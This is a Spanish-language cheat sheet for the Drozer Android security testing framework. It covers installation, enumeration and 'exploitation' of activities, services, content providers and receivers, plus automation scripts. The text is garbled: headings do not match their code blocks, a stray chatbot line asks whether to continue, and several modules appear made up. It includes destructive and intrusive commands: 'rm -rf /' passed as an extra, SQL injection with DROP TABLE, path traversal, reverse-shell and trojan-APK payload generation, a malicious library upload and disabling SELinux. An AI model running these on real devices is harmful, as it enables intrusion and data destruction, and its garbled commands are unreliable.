Hoja de Referencia de Drozer
## Descripción General
Drozer es un marco integral de pruebas de seguridad para aplicaciones Android. Te permite asumir el rol de una aplicación Android e interactuar con la máquina virtual Dalvik, los puntos finales IPC de otras aplicaciones y el sistema operativo subyacente. Drozer proporciona herramientas para la explotación remota de dispositivos Android a través de aplicaciones maliciosas y una evaluación de seguridad completa de aplicaciones Android.
⚠️ Advertencia: Utiliza Drozer solo en dispositivos y aplicaciones que poseas o para los que tengas permiso explícito de prueba. El uso no autorizado puede violar los términos de servicio o leyes locales.
Instalación
Requisitos Previos
Instalación en Linux
Instalación en macOS
Instalación en Windows
Configuración del Dispositivo Android
Uso Básico
Conectarse al Dispositivo
Comandos Básicos
Análisis de Paquetes
Información del Paquete
Componentes de la Aplicación
Pruebas de Actividad
Enumeración de Actividades
Explotación de Actividades
Pruebas de Servicio
Enumeración de Servicios
Explotación de Servicios
Pruebas de Proveedor de Contenido
Enumeración de Proveedor de Contenido
Explotación de Proveedor de Contenido
Pruebas de Receptor de Transmisión
Enumeración de Receptor de Transmisión
Explotación de Receptor de Transmisión
Análisis del Sistema de Archivos
Enumeración del Sistema de Archivos
Explotación del Sistema de Archivos
Would you like me to continue with the remaining sections or placeholders?```bash
Install Java Development Kit
sudo apt update sudo apt install openjdk-11-jdk
Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip
Install Android SDK and ADB
sudo apt install android-tools-adb android-tools-fastboot
Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64 echo ‘export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64’ >> ~/.bashrc
### Linux Installation
```bash
# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl
# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py installmacOS Installation
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Python 2.7
brew install python@2
# Install Drozer
pip2 install drozer
# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apkWindows Installation
# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/
# Install Drozer using pip
pip install drozer
# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/Android Device Setup
# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging
# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk
# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON
# Forward port for communication
adb forward tcp:31415 tcp:31415Basic Usage
Connecting to Device
# Connect to Drozer agent
drozer console connect
# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415
# List available devices
drozer console devices
# Connect to specific device
drozer console connect --device <device_id>Basic Commands
# List available modules
dz> list
# Get help for specific module
dz> help app.package.list
# List installed packages
dz> run app.package.list
# Get package information
dz> run app.package.info -a com.example.app
# List activities
dz> run app.activity.info -a com.example.app
# List services
dz> run app.service.info -a com.example.app
# List broadcast receivers
dz> run app.broadcast.info -a com.example.appPackage Analysis
Package Information
# List all packages
dz> run app.package.list
# List packages with filter
dz> run app.package.list -f keyword
# Get detailed package information
dz> run app.package.info -a com.example.app
# List package permissions
dz> run app.package.info -a com.example.app -p
# Find packages with specific permission
dz> run app.package.list -p android.permission.INTERNET
# List system packages
dz> run app.package.list -f system
# List third-party packages
dz> run app.package.list -3Application Components
# List activities
dz> run app.activity.info -a com.example.app
# List exported activities
dz> run app.activity.info -a com.example.app -e
# List services
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -eActivity Testing
Activity Enumeration
# Find activities in package
dz> run app.activity.info -a com.example.app
# Find exported activities
dz> run app.activity.info -a com.example.app -e
# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i
# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERAActivity Exploitation
# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity
# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret
# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data
# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com
# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug trueService Testing
Service Enumeration
# List services in package
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMINService Exploitation
# Start service
dz> run app.service.start --component com.example.app com.example.BackgroundService
# Start service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"
# Send intent to service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"
# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundServiceContent Provider Testing
Content Provider Enumeration
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -e
# Find URIs for content provider
dz> run app.provider.finduri com.example.provider
# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.appContent Provider Exploitation
# Query content provider
dz> run app.provider.query content://com.example.provider/users
# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin
# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret
# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword
# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"
# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"
# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts
# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txtBroadcast Receiver Testing
Broadcast Receiver Enumeration
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# Find receivers for specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETEDBroadcast Receiver Exploitation
# Send broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION
# Send broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"
# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED
# Send ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high
# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode trueFile System Analysis
File System Enumeration
# List application files
dz> run tools.file.list /data/data/com.example.app/
# Find readable files
dz> run tools.file.readable /data/data/com.example.app/
# Find writable files
dz> run tools.file.writable /data/data/com.example.app/
# Search for files with specific patterns
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/File System Exploitation
# Read file contents
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml
# Download file
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db
# Upload file
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so
# Create symbolic link
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt
# Change file permissions
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt
```## Análisis de Base de Datos
```bash
# Find SQLite databases
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Connect to SQLite database
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db
# List tables in database
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db
# Query database
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"
# Test for SQL injection in content providers
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"
# Dump database schema
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db
# Export database
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql
```### Pruebas de Base de Datos SQLite
```bash
# Check network security config
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml
# List network interfaces
dz> run tools.setup.network
# Check for cleartext traffic
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app
# Test for certificate pinning bypass
dz> run scanner.misc.checkpinning -a com.example.app
```## Análisis de Red
```bash
# Test SSL certificate validation
dz> run scanner.misc.native -a com.example.app
# Check for weak SSL implementations
dz> run scanner.misc.checkssl -a com.example.app
# Test for certificate transparency
dz> run scanner.misc.checkcertificatetransparency -a com.example.app
```### Configuración de Red
```python
# Create custom Drozer module
# File: ~/.drozer_modules/custom/exploit.py
from drozer.modules import common, Module
class CustomExploit(Module, common.FileSystem, common.PackageManager):
name = "Custom Exploit Module"
description = "Custom exploitation module"
examples = "run custom.exploit -a com.example.app"
author = "Security Researcher"
date = "2024-01-01"
license = "BSD (3 clause)"
path = ["custom"]
def add_arguments(self, parser):
parser.add_argument("-a", "--package", help="target package")
def execute(self, arguments):
if arguments.package:
self.stdout.write("Exploiting package: %s\n" % arguments.package)
# Custom exploitation logic here
else:
self.stdout.write("Please specify target package\n")
```### Pruebas SSL/TLS
```bash
# Generate malicious APK
dz> run payload.apk.create --output /tmp/malicious.apk
# Generate reverse shell payload
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444
# Generate bind shell payload
dz> run payload.bind.shell --port 4444
# Embed payload in legitimate APK
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk
```## Explotación Avanzada
```bash
# Check for root access
dz> run tools.setup.busybox
# Exploit setuid binaries
dz> run exploit.setuid.find
# Test for kernel exploits
dz> run exploit.kernel.check
# Exploit application vulnerabilities
dz> run exploit.app.privilege -a com.example.app
# Test for directory traversal
dz> run exploit.traversal.test -a com.example.app
```### Desarrollo de Módulos Personalizados
```python
#!/usr/bin/env python2
import subprocess
import json
import sys
class DrozerAutomation:
def __init__(self, package_name):
self.package = package_name
self.results = \\\\{\\\\}
def run_drozer_command(self, command):
"""Execute Drozer command and return output"""
try:
cmd = ["drozer", "console", "connect", "-c", command]
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
return output.decode('utf-8')
except subprocess.CalledProcessError as e:
return f"Error: \\\\{e.output.decode('utf-8')\\\\}"
def analyze_package(self):
"""Perform comprehensive package analysis"""
print(f"[+] Analyzing package: \\\\{self.package\\\\}")
# Package information
self.results['package_info'] = self.run_drozer_command(
f"run app.package.info -a \\\\{self.package\\\\}"
)
# Activities
self.results['activities'] = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\}"
)
# Services
self.results['services'] = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\}"
)
# Content Providers
self.results['providers'] = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\}"
)
# Broadcast Receivers
self.results['receivers'] = self.run_drozer_command(
f"run app.broadcast.info -a \\\\{self.package\\\\}"
)
return self.results
def test_exported_components(self):
"""Test exported components for vulnerabilities"""
print("[+] Testing exported components")
# Test exported activities
exported_activities = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\} -e"
)
# Test exported services
exported_services = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\} -e"
)
# Test exported providers
exported_providers = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\} -e"
)
return \\\\{
'exported_activities': exported_activities,
'exported_services': exported_services,
'exported_providers': exported_providers
\\\\}
def test_content_providers(self):
"""Test content providers for vulnerabilities"""
print("[+] Testing content providers")
# Find URIs
uris = self.run_drozer_command(
f"run app.provider.finduri \\\\{self.package\\\\}"
)
# Scan for accessible URIs
accessible_uris = self.run_drozer_command(
f"run scanner.provider.finduris -a \\\\{self.package\\\\}"
)
return \\\\{
'uris': uris,
'accessible_uris': accessible_uris
\\\\}
def generate_report(self):
"""Generate comprehensive security report"""
report = \\\\{
'package': self.package,
'analysis_results': self.results,
'exported_components': self.test_exported_components(),
'content_provider_tests': self.test_content_providers()
\\\\}
with open(f"\\\\{self.package\\\\}_security_report.json", 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Report saved: \\\\{self.package\\\\}_security_report.json")
return report
# Usage
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python2 drozer_automation.py <package_name>")
sys.exit(1)
package_name = sys.argv[1]
analyzer = DrozerAutomation(package_name)
analyzer.analyze_package()
analyzer.generate_report()
```### Generación de Payload
```bash
#!/bin/bash
# Batch testing script for multiple packages
PACKAGES_FILE="packages.txt"
RESULTS_DIR="drozer_results"
mkdir -p $RESULTS_DIR
while IFS= read -r package; do
echo "[+] Testing package: $package"
# Create package-specific directory
mkdir -p "$RESULTS_DIR/$package"
# Run comprehensive tests
drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"
# Test content providers
drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"
# Test for common vulnerabilities
drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"
echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"
echo "[+] Batch testing completed"
```### Escalada de Privilegios
```bash
# Check if Drozer agent is running
adb shell am start -n com.mwr.dz/.activities.MainActivity
# Verify port forwarding
adb forward --list
adb forward tcp:31415 tcp:31415
# Restart ADB server
adb kill-server
adb start-server
# Check device connectivity
adb devices
# Test connection manually
telnet localhost 31415
```## Scripts de Automatización
```bash
# Reinstall Drozer agent
adb uninstall com.mwr.dz
adb install drozer-agent-2.4.4.apk
# Check agent permissions
adb shell dumpsys package com.mwr.dz
# Enable agent in device settings
# Settings > Apps > Drozer Agent > Permissions
# Check if agent service is running
adb shell ps|grep drozer
```### Script de Evaluación Integral
```bash
# Refresh module list
dz> reload
# Check module path
dz> list
# Install custom modules
mkdir -p ~/.drozer_modules
cp custom_module.py ~/.drozer_modules/
# Debug module loading
dz> help custom.module
```### Script de Pruebas por Lotes
```bash
# Check required permissions
adb shell dumpsys package com.example.app|grep permission
# Grant permissions manually
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE
# Check SELinux status
adb shell getenforce
# Disable SELinux (if rooted)
adb shell su -c "setenforce 0"
```## Resolución de Problemas
```bash
# Increase timeout values
dz> set timeout 30
# Reduce output verbosity
dz> set verbose false
# Clear cache
rm -rf ~/.drozer/cache/
# Use specific device
drozer console connect --device <device_id>
```### Problemas de Conexión
https://labs.f-secure.com/tools/drozer/### Problemas de Agente
https://github.com/FSecureLABS/drozer### Problemas de Módulo
https://labs.f-secure.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf### Problemas de Permisos
https://blog.securelayer7.net/android-penetration-testing-using-drozer/### Problemas de Rendimiento
https://owasp.org/www-project-mobile-security-testing-guide/## Recursos
https://developer.android.com/training/articles/security-tips- [Documentación Oficial de Drozer](https://github.com/FSecureLABS/drozer/wiki/Writing-a-Module*Esta hoja de referencia proporciona una guía completa para usar Drozer en pruebas de seguridad de aplicaciones Android. Asegúrese siempre de tener la autorización adecuada antes de probar cualquier aplicación o dispositivo Android.*